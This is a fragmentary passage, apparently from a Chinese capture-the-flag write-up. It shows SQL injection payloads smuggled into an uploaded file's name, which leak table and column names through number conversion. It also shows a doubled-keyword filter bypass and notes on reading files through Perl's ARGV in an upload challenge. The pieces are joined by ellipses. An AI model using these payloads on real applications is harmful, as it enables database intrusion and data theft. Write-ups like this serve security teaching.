where table_schema='web_upload' limit 1,1)),25,12),16,10))+'.jpg
回显为126853610566245转化为字符串为s_here
得到表名...),16,10))+'.jpg
回显为115858377367398转化为字符串为i_am_f
Exp修改为à)),13,12),16,10))
回显为7102823转化为字符串为lag
合并列名为i_am_flag...frfromom hello_flag_is_here limit 0,1)),25,12),16,10))+'.jpg
回显为560750951
转化为字符串为!...(findReqR6()))返回正确的userinput
?...没啥头绪,看了一下博客和wp,
猜测文件上传的代码为如下图
?
param()会返回一个列表文件但是只有第一个文件会被放入到下面的file变量中,传入ARGV文件,perl会将文件名读出来
?